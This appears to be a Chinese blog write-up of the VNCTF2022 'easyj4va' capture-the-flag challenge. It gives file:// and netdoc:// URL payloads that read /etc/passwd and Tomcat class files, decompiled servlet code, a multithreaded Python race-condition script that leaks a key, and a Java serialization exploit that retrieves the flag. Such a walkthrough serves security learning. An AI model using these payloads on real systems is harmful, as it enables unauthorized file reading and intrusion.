[VNCTF2022]easyj4va

最新推荐文章于 2024-07-04 10:28:30 发布
最新推荐文章于 2024-07-04 10:28:30 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: JAVA安全 文章标签: java 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/128052750
版权

看源码

 

 输入 /file?url = 1报错

 用伪协议可以读取到内容

/file?url=file:///etc/passwd

 然后就是查看java字节码文件的目录

file?url=file:///usr/local/tomcat/webapps/ROOT/WEB-INF
这里官方给了另外一个协议netdoc,跟file用法是一样的,但是这个netdoc协议在jdk9以后就不能用了
file?url=netdoc:///usr/local/tomcat/webapps/ROOT/WEB-INF

 以下为读文件的payload

file?url=netdoc:///usr/local/tomcat/webapps/ROOT/WEB-INF/classes
controller
entity
    User.class
servlet
    FileServlet.class
	HelloWorldServlet.class
util
    Secr3t.class
    SerAndDe.class
    UrlUtil.class

file?url=file:///usr/local/tomcat/webapps/ROOT/WEB-INF/classes/servlet/FileServlet.class
file?url=netdoc:///usr/local/tomcat/webapps/ROOT/WEB-INF/classes/servlet/HelloWorldServlet.class

读到的文件 可以jd-gui 反编译,也可以用网上的在线工具:JAVA反向工程网 (javare.cn)

也可以用IDeA

HelloWorldServlet.class
    
package servlet;

import entity.User;
import java.io.IOException;
import java.util.Base64;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import util.Secr3t;
import util.SerAndDe;

@WebServlet(name = "HelloServlet", urlPatterns = {"/evi1"})
public class HelloWorldServlet extends HttpServlet {
    private volatile String age = "666";
    private volatile String height = "180";
    private volatile String name = "m4n_q1u_666";
    User user;

    public void init() throws ServletException {
        this.user = new User(this.name, this.age, this.height);
    }

    /* access modifiers changed from: protected */
    public void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        String reqName = req.getParameter("name");
        if (reqName != null) {
            this.name = reqName;
        }
        if (Secr3t.check(this.name)) {
            Response(resp, "no vnctf2022!");
        } else if (Secr3t.check(this.name)) {
            Response(resp, "The Key is " + Secr3t.getKey());
        }
    }

    /* access modifiers changed from: protected */
    public void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        String key = req.getParameter("key");
        String text = req.getParameter("base64");
        if (!Secr3t.getKey().equals(key) || text == null) {
            Response(resp, "KeyError");
            return;
        }
        if (this.user.equals((User) SerAndDe.deserialize(Base64.getDecoder().decode(text)))) {
            Response(resp, "Deserialize…… Flag is " + Secr3t.getFlag().toString());
        }
    }

    private void Response(HttpServletResponse resp, String outStr) throws IOException {
        ServletOutputStream out = resp.getOutputStream();
        out.write(outStr.getBytes());
        out.flush();
        out.close();
    }
}

 主要看 hello.class 中的doPOst方法:

 这里可以getFlag。但是需要满足Key相同,且另一个是反序列化一个一样的user对象

protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
    String key = req.getParameter("key");
    String text = req.getParameter("base64");
    if (Secr3t.getKey().equals(key) && text != null) {
        Decoder decoder = Base64.getDecoder();
        byte[] textByte = decoder.decode(text);
        User u = (User)SerAndDe.deserialize(textByte);
        if (this.user.equals(u)) {
            this.Response(resp, "Deserialize…… Flag is " + Secr3t.getFlag().toString());
        }
    } else {
        this.Response(resp, "KeyError");
    }

}

 先获取KEY,调用的是Secr3t类。

先来看看

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package util;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import org.apache.commons.lang3.RandomStringUtils;

public class Secr3t {
    private static final String Key = RandomStringUtils.randomAlphanumeric(32);
    private static StringBuffer Flag;

    private Secr3t() {
    }

    public static String getKey() {
        return Key;
    }

    public static StringBuffer getFlag() {
        Flag = new StringBuffer();
        InputStream in = null;

        try {
            in = Runtime.getRuntime().exec("/readflag").getInputStream();
        } catch (IOException var12) {
            var12.printStackTrace();
        }

        BufferedReader read = new BufferedReader(new InputStreamReader(in));

        try {
            String line = null;

            while((line = read.readLine()) != null) {
                Flag.append(line + "\n");
            }
        } catch (IOException var13) {
            var13.printStackTrace();
        } finally {
            try {
                in.close();
                read.close();
            } catch (IOException var11) {
                var11.printStackTrace();
                System.out.println("Secr3t : io exception!");
            }

        }

        return Flag;
    }

    public static boolean check(String checkStr) {
        return "vnctf2022".equals(checkStr);
    }
}

 这里 第二个 if 需要name 不等于 "vnctf2022", 而第三个if 又需要 this.name = "vnctf2022".

矛盾了

 这里涉及一个知识点:Servlet的线程安全问题 | Y4tacker's Blog

总结一下

然后回到doGet这里,我们要获取key,就要绕过第一个if,即this.name先不为vnctf2022,然后再下一个if下又为vnctf2022,这里就接触到一个线程安全的漏洞,就是servlet在收到请求的时候不会每次请求都实例化一个对象,这样太消耗资源了,所以servlet处理请求时是在第一次实例化一个类,当后面再次请求的时候会使用之前实例化的那个对象,也就是说相当于多个人同时操作一个对象

而这个this.name 刚好判断的是实例化对象的属性,只要我们在进入第一个if的时候,用另外一个线程让它的name属性不为vnctf2022,然后当进入第二个线程的时候,在操作它变成vnctf2022,那不就进入了第二个if条件内吗。

脚本:

import time
import requests
from threading import Thread

url = 'http://01b0fd97-c90e-46e3-8809-b624bb4cfa1d.node4.buuoj.cn:81/evi1'
payload1 = "?name=vnctf2022"
payload2 = "?name=snowy"
ses = requests.session()


def get(session, payload):
    while True:
        res = session.get(url=url+payload)
        print(url+payload)
        print(res.text)
        if "key" in res.text:
            print(res.text)
        time.sleep(0.1)


if __name__ == '__main__':
    for i in range(2):
        Thread(target=get, args=(ses, payload1,)).start()
    for j in range(2):
        Thread(target=get, args=(ses, payload2,)).start()



The Key is 3wL5Ajzw9ew6WU9AfhIB58GzH4coiCl5

接着就是反序列化的步骤了

继续看到 doPOst方法

看到第一个if

他将text参数进行了base64解码 并且转为了字节流的形式,然后传入SerAndDe.deserialize(),先不去看源码,应该就是一个进行反序列化的操作, 先试着序列化反序列化。用题目自身的代码去执行。

先进行序列化 再进行base64

import entity.User;
import java.util.Base64;
import util.SerAndDe;


public class testSerializable
{
    public static void main(String[] args){
        User user = new User("snowy","18","180");
        Base64.Encoder  encoder = Base64.getEncoder();
        byte[] textByte = SerAndDe.serialize(user);
        String text = encoder.encodeToString(textByte);
        System.out.println(text);
    }
}

把结果传入url

 发现打不通, 要注意的是 这里的User.java 中 height 属性是由 transient修饰的,所以再生成byte的时候需要重写下 writeObject类 否则会将自己的User对象 height为空。

private transient String height;

User.java最后加上

private void writeObject(java.io.ObjectOutputStream s) throws java.io.IOException{
 s.defaultWriteObject();
 //强制序列化name
 s.writeObject(this.height);
}

参考文献:java-Transient关键字、Volatile关键字介绍和序列化、反序列化机制、单例类序列化_龙吟在天的博客-CSDN博客_volatile 序列化

 exp:

import entity.User;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.Base64;

public class Exp {
    public static void main(String[] args) throws IOException {
        User user = new User("m4n_q1u_666","666","180");
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(user);

        byte[] bytes = byteArrayOutputStream.toByteArray();
        Base64.Encoder encoder = Base64.getEncoder();
        String s = encoder.encodeToString(bytes);
        System.out.println(s);
        
    }
}

最后传入 key 和base64的结果即可

 因为环境消失了  更换了key

snowlyzz
关注
专栏目录
[VNCTF 2022] easyjava
Sentiment的博客
06-10 1948
提示传参随便传个参数后,发现是Tomcat框架的直接读文件 web.xml没啥信息 后来发现有个classes目录 file协议读取文件即可(JDK 9之前,也可以用协议),读取后进行反编译,最开始用的jd-gui,结果有一个地方反编译有点小差错还是用在线工具吧。JAVA反向工程网 (javare.cn)反编译好后先看下的doGet函数 这里的方法就是检测传入的参数值是不是vnctf2022 所以这里如果想得到key就需要name传参vnctf2022,但传参后又会执行if中的语句,if和else中的语句相
2021-CISCN-fianl-ezj4va
feng的博客
03-04 4814
2021-CISCN-fianl-ezj4va 前言 去年国赛决赛的0解Java,后来出现在了DASCTF八月挑战赛,当时不太会Java所以没有看,今天找个时间复现了一下。写的比较简单,具体可以看参考链接中的文章。 代码审计 访问/robots.txt得到文件名可以下载到源码。 pom.xml: <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
BUUCTF 【加固题 Ezsql】—基于xshell工具
最新发布
s2018414的博客
07-04 920
说明:当前在学习安全加固,buuctf中的加固题成功获取到flag,以此记录,便于后续学习。
[CTF] BUUCTF系统加固题 → Ezsql
ZXW_NUDT的博客
12-09 5870
小声说:这可能是全网唯一一个Writeup 接下来讲讲具体咋做 第一步:肯定是用KALI上ssh登一下 然后找到index.php这个文件 接着查看文件里面的内容,最好是复制到VSCode上改完再粘贴回去 index.php文件内容如下: <!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible"
buuctf——Easy-Java
weixin_46107179的博客
08-04 442
有一个help点击进去是一个java的报错信息说未找到该文件,根据观察URL,可能是文件包含,根据题目提示是java,尝试读取WEB-INF/web.xml文件 发现还是不能读取到,尝试用burp改一下请求方式,结果读取到web.xml配置文件 根据java项目的结构可以得到class文件,(一般关于java得到源码的思路:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码) /WEB-INF/web.xml:Web应用程序配置文件,描述了
BUUCTF 加固题 Ezsql wp
weixin_52829570的博客
02-04 3820
题目: 一. 漏洞 在登录页面存在sql注入,可用万能密码进行登录 用户名: admin' or 1=1# 密码: 随便 这道题就是加固这个登录页面的sql注入即可获取flag 二. 加固 根据给的地址和端口ssh连接目标机器,进入/var/www/html目录 在此处新建一个phpinfo.php并写入语句<?php phpinfo(); ?> 访问phpinfo.php可以看到当前php版本为7.3.18 php中防止sql注入的函数无非就那么几个(我所知道
Visual Studio 2022 小番茄VA插件
04-19
**Visual Studio 2022 小番茄VA插件** Visual Studio 2022是Microsoft推出的最新一代集成开发环境(IDE),专为现代软件开发提供了强大的工具集。这款IDE支持多种编程语言,包括C++,并且在性能、内存管理以及用户...
vs2022 小番茄 插件 VA_X64 懂得都懂 亲测可用
03-09
VA_X_Setup2440_0;Visual Assist;VA_X64.dll
Visual Assist X10.9.2451(安装包+学习补丁)(VA插件,支持VS 2022)
07-26
4. **格式化与美化**:VA X可以自动对代码进行格式化,保持代码风格的一致性,提高代码可读性。 5. **错误检测与修复**:在编写代码时,VA X会实时检测潜在的语法错误和逻辑问题,帮助开发者尽早发现并修复问题。 ...
VS2022 VISUAL ASSIST X 小番茄 v10.9.2435.0 VA_X_Setup2440_0.exe
02-25
VS2022 VISUAL ASSIST X 小番茄 v10.9.2435.0 VA_X_Setup2440_0.exe
Visual assistX 支持Visual Studio 2022
06-20
《Visual AssistX与Visual Studio 2022的深度整合》 Visual AssistX是一款广受开发者欢迎的Visual Studio插件,它极大地提升了代码编辑、重构和导航的效率。随着Visual Studio 2022的发布,Visual AssistX也...
CTF题之BUUCTF系列:BUUCTF Misc N种方法解决
一只小蜜蜂的博客
07-31 4796
一、名称 BUUCTF Misc N种方法解决 二、题目链接:https://buuoj.cn/challenges 解压缩后是一个exe执行文件 双击执行后,弹出以下提示: 无法打开,未获得结果,换其它解决方法。 三、解题步骤 1、使用winhex工具打开KEY.exe文件,查看一下内部结构 2、发现文档后面有两个等号(==),前面有着data:image/jpg;base64。猜测可能是一个经过base64编码的图片,于是将那一串字符串作为网址,粘贴到浏览器中,打..
BUUCTF-easy java WEB-INF/web.xml泄露漏洞及其利用
zy1276046082的博客
01-02 580
WEB-INF/web.xml泄露漏洞及其利用 BUUCTF-easy java
MTCTF2022 WP
Pysnow's Blog
09-18 928
MTCTF2022
【Web】记录CISCN 2021 总决赛 ezj4va题目复现——AspectJWeaver
uuzeray的博客
03-22 1372
这就是当年传说中的零解题嘛😭,快做🤮了有了之前的经验,思路顺挺快的,中间不知道为啥一直一直一直一直报错,耗了一个下午总算打通考的是AspectJWeaver写恶意字节码到靶机上(本题jsp靶机不解析),再去对其进行反序列化值得一提的是,本题并未在输入流进行黑名单过滤,事实上就是纯粹的原生反序列化,但因该jdk下无利用链可打,所以只能先迂回写入一个恶意类,再对这个恶意类进行反序列化操作,实在是巧思!
【程序员比赛】CISCN 2021 ezj4va与Fix思路
WLANQY的博客
01-06 342
首先我们谈一谈什么是运维。很多人对运维有自己的理解,他们认为运维是一件特别简单的事情。当我们企业购买了一些信息化的产品,硬件、软件等,我们需要有一个团队让它正常的运转。但是在运转的过程当中,不可避免的会出现各种问题,这就需要有一个专门的团队来做保障。如果你只是把运维简单的理解为一个平台,我觉得这种认识可能比较肤浅。到底什么是运维呢?网上有很多理解 ,关于运维工作的划分,包括网站的运维、系统的运维、网络的运维、数据库的运维、IT 的运维,运维开发、运维安全。
BUUCTF百题刷题总结(一)
qwzf
09-14 2082
前言 最近打算开始刷BUU的Web题了,之前已经刷过一些,有的总结了,有的没有总结。总结过的这里只写之前总结的链接;没总结的,原因是当时感觉有点简单,这里简单写下考察知识点和解题思路。 新刷的Web题,会认真总结。本篇主要记录之前刷的题,BUUCTF刷题系列持续更新(SQL注入题单独记录)! 0x01 [HCTF 2018]WarmUp 考点:PHP代码审计+绕过自定义函数+文件包含 查看源代码,发现source.php,访问发现源码 <?php highlight_file(__FILE_
buuctf刷题
qq_41788704的博客
10-28 1996
buuctf刷题BJDCTF2020 Easy MD5网鼎杯 2020 青龙组 AreUSerialzGYCTF2020 Blacklist强网杯 2019 随便注 BJDCTF2020 Easy MD5 进来就是一个输入框,发包查看返回信息 可以看到SQL语句。这里猜想MD5出来的值会不会可以可以这样利用 select * from ‘admin’ where password=’‘or’1’ 这段PHP代码可以找到MD5出来的值类似于 '‘or’1…’ <?php for ($i = 0;;)
BUUCTF_RoarCTF2019_EasyJava
qq_45628145的博客
05-30 660
BUUCTF_RoarCTF2019_EasyJava 进去之后是一个登陆框,试一下admin和admin888进去了,但是没有任何信息,只是说flag is not here 点击help的页面出现异常,这里发送的是GET请求,想到servlet里面有doGet和doPost两个方法,于是改成POST请求再发一次 下载到了help.docx,但是没有flag,这里想到下载一下WEB-INF文件夹下面的web.xml看看配置信息,因为学过一些java开发,这里一下就想到了,发现东西,访问一下看看
vs2022安装va_x
09-04
要安装vs2022上的"va_x",首先需要确保您的电脑上已经安装了Visual Studio 2022开发环境。然后,您可以按照以下步骤进行安装: 1. 打开Visual Studio 2022。 2. 在顶部菜单栏中选择 "扩展"。 3. 在下拉菜单中选择 "管理扩展"。 4. 在左侧菜单中选择 "在线",然后搜索 "va_x"扩展。 5. 在搜索结果中,找到 "va_x"扩展并点击 "下载"按钮。 6. 下载完成后,点击 "安装"按钮进行安装。 7. 安装完成后,您可能需要重新启动Visual Studio 2022以使扩展生效。 现在,您应该已经成功安装了"va_x"扩展。您可以在Visual Studio 2022的界面上找到相关的功能,并开始使用它们。 需要注意的是,具体安装步骤可能因版本和操作系统而有所不同。如果您在安装过程中遇到任何问题,建议您查阅官方文档或与扩展开发者联系以获取更详细的安装步骤和支持。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值